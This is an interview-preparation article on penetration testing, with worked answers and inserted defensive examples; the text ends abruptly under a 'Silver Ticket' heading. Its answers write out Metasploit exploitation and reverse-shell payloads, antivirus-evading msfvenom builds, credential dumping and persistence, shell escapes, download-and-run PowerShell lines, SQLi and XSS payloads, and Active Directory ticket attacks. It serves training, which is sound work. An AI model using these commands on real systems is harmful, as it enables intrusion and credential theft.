November 25, 2025
13 min read

Penetration Tester Interview Questions: Complete Guide

Tags: interview, career-advice, job-search

Author: Milad Bonakdar

Master penetration testing concepts with comprehensive interview questions covering ethical hacking, vulnerability assessment, Metasploit, Burp Suite, and security testing methodologies for penetration tester roles.


Introduction

Penetration Testers (Ethical Hackers) identify security vulnerabilities by simulating real-world attacks. This role requires deep knowledge of hacking techniques, security tools, and methodologies to help organizations strengthen their defenses.

This guide covers essential interview questions for penetration testers, focusing on ethical hacking, vulnerability assessment, and security testing tools.


Penetration Testing Fundamentals

1. What are the phases of a penetration test?

Answer: Structured penetration testing methodology:

1. Planning & Reconnaissance:

  • Define scope and objectives
  • Gather intelligence (passive/active)

2. Scanning:

  • Identify live hosts, open ports, services
  • Vulnerability scanning

3. Gaining Access:

  • Exploit vulnerabilities
  • Obtain initial foothold

4. Maintaining Access:

  • Install backdoors
  • Privilege escalation

5. Analysis & Reporting:

  • Document findings
  • Provide remediation recommendations

Reconnaissance Example:

# Passive reconnaissance
whois target.com
nslookup target.com
dig target.com ANY

# Active reconnaissance
nmap -sn 192.168.1.0/24  # Host discovery
nmap -sV -sC target.com  # Service/version detection

Rarity: Very Common
Difficulty: Medium


Vulnerability Assessment

2. How do you prioritize vulnerabilities?

Answer: Risk-based prioritization using CVSS and business context:

CVSS Scoring:

  • Critical (9.0-10.0): Remote code execution, authentication bypass
  • High (7.0-8.9): SQL injection, XSS with data access
  • Medium (4.0-6.9): Information disclosure, CSRF
  • Low (0.1-3.9): Minor information leakage

Prioritization Factors:

from dataclasses import dataclass

@dataclass
class Vulnerability:
    """Finding as consumed by calculate_risk_score (values used below)"""
    cvss_score: float
    asset_criticality: str          # 'critical' | 'high' | 'medium' | 'low'
    data_type: str                  # 'pii' | 'financial' | 'confidential' | 'public'
    exploit_available: bool = False # weaponised exploit is public
    poc_available: bool = False     # proof-of-concept only

def calculate_risk_score(vulnerability):
    """Calculate a 0-10 risk score by weighting the CVSS base score
    with exploitability, asset criticality and data sensitivity"""
    # Base CVSS score
    cvss_score = vulnerability.cvss_score

    # Exploitability
    if vulnerability.exploit_available:
        exploitability = 1.5
    elif vulnerability.poc_available:
        exploitability = 1.2
    else:
        exploitability = 1.0

    # Asset criticality
    asset_value = {
        'critical': 3.0,  # Production database
        'high': 2.0,      # Web application
        'medium': 1.5,    # Internal tool
        'low': 1.0        # Test environment
    }[vulnerability.asset_criticality]

    # Data sensitivity
    data_sensitivity = {
        'pii': 2.0,       # Personal data
        'financial': 2.5, # Payment info
        'confidential': 1.5,
        'public': 1.0
    }[vulnerability.data_type]

    risk_score = cvss_score * exploitability * asset_value * data_sensitivity
    return min(risk_score, 10.0)  # Cap at 10

Rarity: Very Common
Difficulty: Medium


Metasploit

3. How do you use Metasploit to exploit a vulnerability?

Answer: Metasploit Framework workflow:

Basic Exploitation:

# Start Metasploit
msfconsole

# Search for exploit
search ms17-010  # EternalBlue

# Use exploit
use exploit/windows/smb/ms17_010_eternalblue

# Show options
show options

# Set target
set RHOSTS 192.168.1.100

# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444

# Check if target is vulnerable
check

# Run exploit
exploit

Meterpreter Commands:

# System information
sysinfo
getuid

# Privilege escalation
getsystem

# Dump credentials
hashdump
load kiwi
cred_all

# Persistence
run persistence -X -i 60 -p 4444 -r 192.168.1.50

# Pivoting
run autoroute -s 10.0.0.0/24
portfwd add -l 3389 -p 3389 -r 10.0.0.10

Payload Generation:

# Generate reverse shell
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=4444 \
  -f exe -o payload.exe

# Encode to evade AV
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -f exe -o encoded_payload.exe

Rarity: Very Common
Difficulty: Medium-Hard


4. How do you perform privilege escalation?

Answer: Privilege escalation exploits misconfigurations to gain higher access levels.

Linux Privilege Escalation:

1. Enumeration:

# System information
uname -a
cat /etc/issue
cat /etc/*-release

# Current user and privileges
id
sudo -l

# Users and groups
cat /etc/passwd
cat /etc/group

# SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Writable directories
find / -writable -type d 2>/dev/null

# Cron jobs
crontab -l
cat /etc/crontab
ls -la /etc/cron*

# Network connections
netstat -antup
ss -tulpn

2. Common Techniques:

SUID Exploitation:

# Find SUID binaries
find / -perm -u=s -type f 2>/dev/null

# Example: Exploiting find
find /home -exec /bin/sh \; -quit

# Example: Exploiting vim
vim -c ':!/bin/sh'

# Example: Exploiting nmap (old versions)
nmap --interactive
nmap> !sh

Sudo Misconfiguration:

# Check sudo permissions
sudo -l

# Example output:
# (ALL) NOPASSWD: /usr/bin/vim

# Exploit vim
sudo vim -c ':!/bin/sh'

# Example: LD_PRELOAD
sudo LD_PRELOAD=/tmp/shell.so find

Kernel Exploits:

# Check kernel version
uname -r

# Search for exploits
searchsploit linux kernel 4.4.0

# Example: Dirty COW
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password

3. Automated Tools:

# LinPEAS (Linux Privilege Escalation Awesome Script)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

# Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
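The same enumeration output is what a hardening review looks at from the other side. Below is an added example (not part of the original article) that audits constructed `sudo -l` output for the three conditions the section above relies on: a `NOPASSWD` rule on a binary that can spawn a shell, an unrestricted `(ALL) ALL` rule, and `LD_PRELOAD` surviving `sudo` through `env_keep`. It also diffs a SUID listing against a baseline; the baseline set, the sample output and the binary list are all constructed for the example.

```python
import re

# Binaries that can spawn a shell or write arbitrary files when run elevated;
# the vim/find/nmap cases shown above are on this list (constructed, not exhaustive)
SHELL_ESCAPE_BINARIES = {"vim", "vi", "nano", "find", "nmap", "less", "more",
                         "awk", "perl", "python", "python3", "bash", "sh", "env"}

# Constructed sample of `sudo -l` output for the audit
SAMPLE_SUDO_L = """\
Matching Defaults entries for deploy on web01:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin:/usr/bin

User deploy may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
    (ALL : ALL) ALL
"""

# "(runas) TAG: cmd, cmd" lines as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_output(text):
    """Return (severity, message, offending_line) tuples for risky sudo settings."""
    findings = []
    for line in text.splitlines():
        if "env_keep" in line and "LD_PRELOAD" in line:
            findings.append(("HIGH", "LD_PRELOAD preserved through sudo (env_keep)", line.strip()))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            if cmd == "ALL":
                findings.append(("CRITICAL", "unrestricted sudo (ALL)", line.strip()))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINARIES:
                sev = "CRITICAL" if "NOPASSWD" in tags else "HIGH"
                findings.append((sev, f"{binary} can spawn a shell as {m.group('runas')}", line.strip()))
    return findings

# Baseline of SUID binaries expected on this host (constructed; build yours from a clean image)
EXPECTED_SUID = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount", "/usr/bin/umount"}

def unexpected_suid(found_paths):
    """Diff the output of `find / -perm -4000 -type f` against the baseline; returns additions."""
    return sorted(set(found_paths) - EXPECTED_SUID)

if __name__ == "__main__":
    for sev, msg, line in audit_sudo_output(SAMPLE_SUDO_L):
        print(f"[{sev}] {msg}: {line}")
    print(unexpected_suid(["/usr/bin/sudo", "/usr/bin/find", "/usr/bin/passwd"]))
```

Running the audit against real `sudo -l` output is a cheap pre-engagement check; the `env_keep` finding in particular is easy to miss because it lives in the Defaults line rather than in a command rule.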

Windows Privilege Escalation:

1. Enumeration:

# System information
systeminfo
hostname
whoami /all

# Users and groups
net user
net localgroup administrators

# Running processes
tasklist /v
wmic process list full

# Services
sc query
wmic service list brief

# Scheduled tasks
schtasks /query /fo LIST /v

# Network connections
netstat -ano

# Installed software
wmic product get name,version

2. Common Techniques:

Unquoted Service Paths:

# Find unquoted service paths
wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Exploit
C:\Program Files\Vulnerable App\service.exe
# Create malicious executable at:
C:\Program.exe

AlwaysInstallElevated:

# Check registry
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both are 1, create malicious MSI
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi

Token Impersonation:

# Meterpreter
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

3. Automated Tools:

# WinPEAS
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
Invoke-WinPEAS

# PowerUp
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks

# Sherlock (Kernel exploits)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
Find-AllVulns
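The unquoted-service-path check above is usually done with the one-line `wmic | findstr` filter; the following added example (not from the original article) implements the same decision as a function so the rule is explicit: an image path that is not quoted, whose executable portion contains a space, and which lives outside `C:\Windows`. It returns the quoted path a remediation should set. The service records are constructed to mirror the `name,pathname,startmode` columns of `wmic service get`.

```python
import re

# Constructed sample of services, as `wmic service get name,pathname,startmode` would list them
SAMPLE_SERVICES = [
    {"name": "VulnSvc",  "pathname": r"C:\Program Files\Vulnerable App\service.exe", "startmode": "Auto"},
    {"name": "GoodSvc",  "pathname": r'"C:\Program Files\Good App\svc.exe" -run',    "startmode": "Auto"},
    {"name": "wuauserv", "pathname": r"C:\Windows\system32\svchost.exe -k netsvcs",   "startmode": "Manual"},
    {"name": "NoSpace",  "pathname": r"C:\Tools\agent.exe --service",                "startmode": "Auto"},
]

# Executable part of an image path ends at the first ".exe"; the rest are arguments
EXE_RE = re.compile(r"^(?P<exe>.+?\.exe)(?P<args>.*)$", re.IGNORECASE)

def find_unquoted_service_paths(services, auto_only=True):
    """Return (service_name, executable, remediated_path) for each service whose
    image path is unquoted, contains a space and lies outside C:\\Windows."""
    findings = []
    for svc in services:
        path = svc["pathname"].strip()
        if auto_only and svc["startmode"].lower() != "auto":
            continue
        if path.startswith('"'):
            continue                      # already quoted: not exploitable this way
        m = EXE_RE.match(path)
        if not m:
            continue
        exe = m.group("exe")
        if " " not in exe or exe.lower().startswith("c:\\windows\\"):
            continue
        remediated = f'"{exe}"{m.group("args")}'
        findings.append((svc["name"], exe, remediated))
    return findings

if __name__ == "__main__":
    for name, exe, fixed in find_unquoted_service_paths(SAMPLE_SERVICES):
        print(f"{name}: {exe}\n   set binPath to: {fixed}")
```

The remediation is the quoted path the function returns, applied with `sc config <service> binPath= "..."` (or by the vendor's installer); the `auto_only` filter matches the `findstr /i "auto"` step above, since a service that never starts on its own gives an attacker nothing to wait for.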

Rarity: Very Common
Difficulty: Hard


Burp Suite

5. How do you find SQL Injection using Burp Suite?

Answer: Systematic SQL injection testing:

1. Intercept Request:

POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=admin&password=test123

2. Send to Repeater: Test manual payloads:

username=admin' OR '1'='1&password=test
username=admin' AND 1=1--&password=test
username=admin' UNION SELECT NULL--&password=test

3. Use Intruder:

Attack Type: Sniper
Payload Position: username=§admin§
Payload List:
  ' OR '1'='1
  ' OR 1=1--
  ' UNION SELECT NULL--
  ' UNION SELECT NULL,NULL--
  admin'--
  ' OR 'a'='a

4. Analyze Responses:

  • Different response lengths
  • Error messages
  • Time delays (blind SQLi)

Advanced Testing:

# Blind SQL injection detection
import requests
import time

def test_blind_sqli(url, param):
    # Time-based detection
    payloads = [
        "' AND SLEEP(5)--",
        "' OR SLEEP(5)--",
        "'; WAITFOR DELAY '00:00:05'--"
    ]
    
    for payload in payloads:
        start = time.time()
        response = requests.post(url, data={param: payload})
        elapsed = time.time() - start
        
        if elapsed > 5:
            print(f"[+] Blind SQLi found with payload: {payload}")
            return True
    
    return False

Rarity: Very Common
Difficulty: Medium


Web Application Testing

6. How do you test for XSS vulnerabilities?

Answer: Comprehensive XSS testing approach:

Types of XSS:

  1. Reflected: Payload in URL/form, reflected immediately
  2. Stored: Payload stored in database
  3. DOM-based: Client-side JavaScript vulnerability

Testing Methodology:

1. Identify Injection Points:

# URL parameters
http://target.com/search?q=<script>alert(1)</script>

# Form inputs
<input name="comment" value="<script>alert(1)</script>">

# HTTP headers
User-Agent: <script>alert(1)</script>

2. Bypass Filters:

// Basic payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

// Bypass filters
<scr<script>ipt>alert(1)</script>
<img src=x onerror="alert(1)">
<IMG SRC=x ONERROR=alert(1)>  // Case variation

// Event handlers
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>

// Encoded payloads
&#60;script&#62;alert(1)&#60;/script&#62;
\u003cscript\u003ealert(1)\u003c/script\u003e

3. Burp Suite XSS Testing:

Intruder Payload List:
  <script>alert(document.domain)</script>
  <img src=x onerror=alert(1)>
  <svg/onload=alert(1)>
  javascript:alert(1)
  <iframe src="javascript:alert(1)">

4. Automated Scanning:

# XSStrike
python xsstrike.py -u "http://target.com/search?q=test"

# Dalfox
dalfox url http://target.com/search?q=FUZZ
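Every payload in the lists above is neutralised by the same two server-side measures: context-aware output encoding and a scheme allowlist for attacker-supplied URLs (a `javascript:` link survives HTML encoding untouched). The block below is an added example written for this guide, not code from the original article; `render_comment`, `safe_href` and the sample inputs are constructed for illustration.

```python
import html
from urllib.parse import urlsplit

def encode_for_html_body(value):
    """Encode untrusted text for an HTML element body or a double-quoted attribute."""
    return html.escape(value, quote=True)

def safe_href(url):
    """Allow only http(s) and same-site relative links; return None for anything
    else (javascript:, data:, vbscript:, and their case/whitespace variants)."""
    # Browsers ignore tabs/newlines inside a scheme, so strip them before parsing
    cleaned = "".join(ch for ch in url if ch.isprintable() and not ch.isspace())
    parts = urlsplit(cleaned)                      # scheme is lower-cased by urlsplit
    if parts.scheme in ("http", "https"):
        return cleaned
    if parts.scheme == "" and cleaned.startswith("/") and not cleaned.startswith("//"):
        return cleaned                             # relative path, not protocol-relative
    return None

def render_comment(author, text, link=None):
    """Render one stored comment: text is encoded, the link goes through the
    allowlist, and both land only in an element body or a quoted attribute."""
    href = safe_href(link) if link else None
    link_html = f' <a href="{encode_for_html_body(href)}">link</a>' if href else ""
    return f"<p><b>{encode_for_html_body(author)}</b>: {encode_for_html_body(text)}{link_html}</p>"

if __name__ == "__main__":
    # Constructed inputs taken from the payload lists above
    for payload in ["<script>alert(1)</script>", "<img src=x onerror=alert(1)>",
                    "<IMG SRC=x ONERROR=alert(1)>", "&#60;script&#62;alert(1)&#60;/script&#62;"]:
        print(render_comment("guest", payload))
    for url in ["javascript:alert(1)", "JavaScript:alert(1)", "java\tscript:alert(1)",
                "//evil.example/x", "https://example.com/docs", "/profile"]:
        print(f"{url!r:32} -> {safe_href(url)!r}")
```

Note that the encoded payload `&#60;script&#62;...` becomes `&amp;#60;script&amp;#62;...` and renders as literal text: encoding on output is safe to apply even when the input was already encoded, which is why it is preferred over input filtering (the case-variation and tag-splitting bypasses above only defeat filters).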

Rarity: Very Common
Difficulty: Medium


7. How do you test API security?

Answer: API security testing focuses on authentication, authorization, and input validation.

Common API Vulnerabilities:

1. Broken Authentication:

# Test weak JWT
curl -H "Authorization: Bearer eyJhbGciOiJub25lIn0..." https://api.example.com/user

# JWT with "alg": "none"
# Modify payload and remove signature

2. Broken Authorization:

# IDOR (Insecure Direct Object Reference)
curl https://api.example.com/user/123
curl https://api.example.com/user/124  # Try other user IDs

# Test different HTTP methods
curl -X DELETE https://api.example.com/user/123
curl -X PUT https://api.example.com/user/123 -d '{"role":"admin"}'

3. Mass Assignment:

# Try adding admin fields
curl -X POST https://api.example.com/register \
  -H "Content-Type: application/json" \
  -d '{
    "username": "attacker",
    "password": "pass123",
    "role": "admin",
    "is_admin": true
  }'
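Two of the three tests above correspond to a specific server-side defect: accepting whatever `alg` the token header names (including `none`), and binding every field of the request body onto the user model. The following added example (written for this guide, not taken from the article or any library) shows the standard-library JWT verification a reviewer expects, with an explicit algorithm allowlist, constant-time signature comparison and an `exp` check, next to a field allowlist for the registration endpoint. The key, claims and field names are constructed.

```python
import base64
import hashlib
import hmac
import json
import time

ALLOWED_ALGS = {"HS256"}    # explicit allowlist: "none" (or an unexpected alg) is never accepted

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a compact HS256 JWT (only needed here to build test tokens)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (_b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + _b64url_encode(json.dumps(claims, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)

def verify_jwt(token: str, key: bytes, now=None) -> dict:
    """Return the claims if the token is valid; raise ValueError otherwise."""
    try:
        h64, p64, s64 = token.split(".")
    except ValueError:
        raise ValueError("malformed token")
    header = json.loads(_b64url_decode(h64))
    alg = header.get("alg")
    if alg not in ALLOWED_ALGS:              # the server, not the token, decides the algorithm
        raise ValueError(f"algorithm not allowed: {alg!r}")
    expected = hmac.new(key, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(p64))
    now = time.time() if now is None else now
    if "exp" not in claims or claims["exp"] < now:
        raise ValueError("expired or missing exp")
    return claims

def is_valid(token: str, key: bytes, now=None) -> bool:
    """Boolean wrapper around verify_jwt for callers that only need accept/reject."""
    try:
        verify_jwt(token, key, now)
        return True
    except ValueError:
        return False

# Mass assignment: bind only the fields this endpoint is meant to accept
REGISTRATION_FIELDS = {"username", "password", "email"}

def bind_registration(payload: dict) -> dict:
    """Drop any client-supplied field outside the allowlist (role, is_admin, ...)."""
    return {k: v for k, v in payload.items() if k in REGISTRATION_FIELDS}

if __name__ == "__main__":
    key = b"constructed-demo-secret"                        # constructed
    good = sign_hs256({"sub": "123", "exp": int(time.time()) + 3600}, key)
    forged = _b64url_encode(b'{"alg":"none"}') + "." + good.split(".")[1] + "."
    print("signed token valid:", is_valid(good, key))
    print('alg "none" token valid:', is_valid(forged, key))
    print(bind_registration({"username": "attacker", "password": "pass123",
                             "role": "admin", "is_admin": True}))
```

When using a real library instead of this hand-rolled verifier, the equivalent control is passing the allowed algorithm list explicitly on every decode call; the `alg: none` and algorithm-confusion bugs all come from letting the token header choose.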

REST API Testing:

# Automated API testing
import requests
import json

class APISecurityTester:
    def __init__(self, base_url, token=None):
        self.base_url = base_url
        self.headers = {}
        if token:
            self.headers['Authorization'] = f'Bearer {token}'
    
    def test_idor(self, endpoint, id_range):
        """Test for IDOR vulnerabilities"""
        accessible_ids = []
        
        for user_id in range(id_range[0], id_range[1]):
            url = f"{self.base_url}/{endpoint}/{user_id}"
            response = requests.get(url, headers=self.headers)
            
            if response.status_code == 200:
                accessible_ids.append(user_id)
                print(f"[+] Accessible: {user_id}")
        
        return accessible_ids
    
    def test_rate_limiting(self, endpoint):
        """Test rate limiting"""
        for i in range(1000):
            response = requests.get(
                f"{self.base_url}/{endpoint}",
                headers=self.headers
            )
            
            if response.status_code == 429:
                print(f"[+] Rate limiting enforced after {i} requests")
                return True
        
        print("[-] No rate limiting detected")
        return False
    
    def test_injection(self, endpoint, payloads):
        """Test for injection vulnerabilities"""
        for payload in payloads:
            data = {"search": payload}
            response = requests.post(
                f"{self.base_url}/{endpoint}",
                headers=self.headers,
                json=data
            )
            
            # Check for SQL errors
            if any(err in response.text.lower() for err in 
                   ['sql', 'mysql', 'sqlite', 'postgresql', 'oracle']):
                print(f"[!] Potential SQL injection: {payload}")
                print(f"Response: {response.text[:200]}")
    
    def test_authentication_bypass(self, login_endpoint):
        """Test authentication bypass"""
        bypass_payloads = [
            {"username": "admin' OR '1'='1", "password": "anything"},
            {"username": "admin", "password": "' OR '1'='1"},
            {"username": "admin'--", "password": ""},
        ]
        
        for payload in bypass_payloads:
            response = requests.post(
                f"{self.base_url}/{login_endpoint}",
                json=payload
            )
            
            if response.status_code == 200:
                print(f"[!] Potential auth bypass: {payload}")

# Usage
tester = APISecurityTester('https://api.example.com')
tester.test_idor('users', (1, 100))
tester.test_rate_limiting('api/search')

GraphQL Testing:

# Introspection query
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name
      fields {
        name
        args {
          name
          type { name }
        }
      }
    }
  }
}
# GraphQL injection
query = '''
query {
  user(id: "1' OR '1'='1") {
    id
    username
    email
  }
}
'''

# GraphQL batching attack
queries = [
    {"query": "query { user(id: 1) { id username } }"},
    {"query": "query { user(id: 2) { id username } }"},
    # ... repeat 1000 times
]

response = requests.post(
    'https://api.example.com/graphql',
    json=queries
)

API Fuzzing:

# Using ffuf for API fuzzing
ffuf -w wordlist.txt -u https://api.example.com/FUZZ -mc 200,301,302

# Parameter fuzzing
ffuf -w params.txt -u https://api.example.com/api?FUZZ=test -mc 200

# Method fuzzing
for method in GET POST PUT DELETE PATCH OPTIONS; do
    curl -X $method https://api.example.com/api/resource
done

Postman/Burp Suite:

// Postman pre-request script
const payload = "' OR '1'='1";
pm.environment.set("injection_payload", payload);

// Postman test script
pm.test("Check for SQL error", function () {
    pm.expect(pm.response.text()).to.not.include("SQL");
    pm.expect(pm.response.text()).to.not.include("mysql");
});

OWASP API Security Top 10:

  1. Broken Object Level Authorization - Test IDOR
  2. Broken Authentication - Test weak tokens
  3. Excessive Data Exposure - Check response data
  4. Lack of Resources & Rate Limiting - Test DoS
  5. Broken Function Level Authorization - Test privilege escalation
  6. Mass Assignment - Test parameter pollution
  7. Security Misconfiguration - Check headers, CORS
  8. Injection - Test SQLi, NoSQLi, command injection
  9. Improper Assets Management - Find old API versions
  10. Insufficient Logging & Monitoring - Check audit logs

Rarity: Common
Difficulty: Medium-Hard


Network Penetration Testing

8. How do you perform network penetration testing?

Answer: Structured network assessment:

1. Network Discovery:

# Ping sweep
nmap -sn 192.168.1.0/24

# ARP scan (local network)
arp-scan -l

# Identify live hosts
netdiscover -r 192.168.1.0/24

2. Port Scanning:

# TCP SYN scan (stealth)
nmap -sS 192.168.1.100

# Service version detection
nmap -sV 192.168.1.100

# OS detection
nmap -O 192.168.1.100

# Aggressive scan
nmap -A -T4 192.168.1.100

# All ports
nmap -p- 192.168.1.100

3. Vulnerability Scanning:

# Nmap NSE scripts
nmap --script vuln 192.168.1.100

# Specific vulnerability
nmap --script smb-vuln-ms17-010 192.168.1.100

# OpenVAS/Nessus for comprehensive scanning

4. Exploitation:

# SMB exploitation
use exploit/windows/smb/ms17_010_eternalblue

# SSH brute force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME root
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

5. Post-Exploitation:

# Lateral movement
# Credential dumping
# Privilege escalation
# Persistence
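From the blue-team side, steps 2 and 4 above are the two events that should light up monitoring: a port sweep and an SSH password-guessing run. The following added example (not part of the original article) implements both detections over constructed log lines: the sshd lines follow the real OpenSSH "Failed password" message format, and the firewall lines are constructed in a netfilter-style `SRC=/DST=/DPT=` layout. Thresholds and the sample data are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt (OpenSSH message format)
SAMPLE_AUTH_LOG = """\
Nov 25 10:00:01 web01 sshd[2311]: Failed password for root from 192.168.1.50 port 51234 ssh2
Nov 25 10:00:02 web01 sshd[2313]: Failed password for root from 192.168.1.50 port 51236 ssh2
Nov 25 10:00:02 web01 sshd[2315]: Failed password for invalid user admin from 192.168.1.50 port 51238 ssh2
Nov 25 10:00:03 web01 sshd[2317]: Failed password for root from 192.168.1.50 port 51240 ssh2
Nov 25 10:00:04 web01 sshd[2319]: Failed password for root from 192.168.1.50 port 51242 ssh2
Nov 25 10:00:05 web01 sshd[2321]: Failed password for invalid user oracle from 192.168.1.50 port 51244 ssh2
Nov 25 10:07:10 web01 sshd[2400]: Failed password for alice from 192.168.1.23 port 40001 ssh2
Nov 25 10:07:30 web01 sshd[2402]: Accepted password for alice from 192.168.1.23 port 40002 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\d+\.\d+\.\d+\.\d+)"
)

def detect_ssh_bruteforce(log_text, threshold=5, window_s=60, year=2025):
    """Return {src_ip: (total_failures, sorted_distinct_users)} for every source with
    >= threshold failed logins inside some sliding window of window_s seconds."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
        events[m.group("src")].append((ts, m.group("user")))
    hits = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                hits[src] = (len(evs), sorted({u for _, u in evs}))
                break
    return hits

# Constructed firewall log: one host probing 12 ports, one host making a normal HTTPS connection
SAMPLE_FW_LOG = "\n".join(
    f"Nov 25 10:01:{i:02d} fw kernel: IN=eth0 SRC=192.168.1.50 DST=192.168.1.100 "
    f"PROTO=TCP SPT={40000 + i} DPT={port} SYN"
    for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445])
) + "\nNov 25 10:02:00 fw kernel: IN=eth0 SRC=192.168.1.23 DST=192.168.1.100 PROTO=TCP SPT=50000 DPT=443 SYN"

FW_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP SPT=\d+ DPT=(?P<dpt>\d+)")

def detect_port_scan(log_text, min_ports=10):
    """Return {(src, dst): sorted_ports} for source/destination pairs where one
    source touched at least min_ports distinct destination ports."""
    ports = defaultdict(set)
    for line in log_text.splitlines():
        m = FW_RE.search(line)
        if m:
            ports[(m.group("src"), m.group("dst"))].add(int(m.group("dpt")))
    return {pair: sorted(p) for pair, p in ports.items() if len(p) >= min_ports}

if __name__ == "__main__":
    print("ssh brute force:", detect_ssh_bruteforce(SAMPLE_AUTH_LOG))
    print("port scans:", detect_port_scan(SAMPLE_FW_LOG))
```

The brute-force rule keys on distinct usernames as well as count, which separates a password spray (many users, one password) from a dictionary attack on one account; both variants of the `ssh_login` module run above will trip it.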

Rarity: Very Common
Difficulty: Hard


9. How do you attack Active Directory environments?

Answer: Active Directory is a prime target with many attack vectors.

Enumeration:

# PowerView enumeration
Import-Module PowerView.ps1

# Get domain information
Get-Domain
Get-DomainController

# Enumerate users
Get-DomainUser
Get-DomainUser -Identity administrator

# Enumerate groups
Get-DomainGroup
Get-DomainGroupMember -Identity "Domain Admins"

# Find shares
Find-DomainShare -CheckShareAccess

# Find computers
Get-DomainComputer

BloodHound:

# Collect data with SharpHound
.\SharpHound.exe -c All

# Or with PowerShell
Import-Module SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

# Upload JSON to BloodHound GUI
# Analyze attack paths to Domain Admins

Kerberoasting:

# Request service tickets
Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat

# Or with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt

AS-REP Roasting:

# Find users with "Do not require Kerberos preauthentication"
Get-DomainUser -PreauthNotRequired

# Request AS-REP
.\Rubeus.exe asreproast /outfile:asrep_hashes.txt

# Crack
hashcat -m 18200 asrep_hashes.txt wordlist.txt

Pass-the-Hash:

# Using Impacket
python3 psexec.py -hashes :ntlmhash <user>@<target-ip>


# Using CrackMapExec
crackmapexec smb 10.10.10.0/24 -u administrator -H ntlmhash

# Dump SAM
python3 secretsdump.py -hashes :ntlmhash <user>@<target-ip>

Pass-the-Ticket:

# Export tickets with Mimikatz
mimikatz # sekurlsa::tickets /export

# Inject ticket
mimikatz # kerberos::ptt ticket.kirbi

# Or with Rubeus
.\Rubeus.exe ptt /ticket:ticket.kirbi

Golden Ticket:

# Get krbtgt hash
mimikatz # lsadump::dcsync /domain:example.com /user:krbtgt

# Create golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /krbtgt:hash /id:500

# Inject ticket
mimikatz # kerberos::ptt ticket.kirbi

Silver Ticket:

# Get service account hash
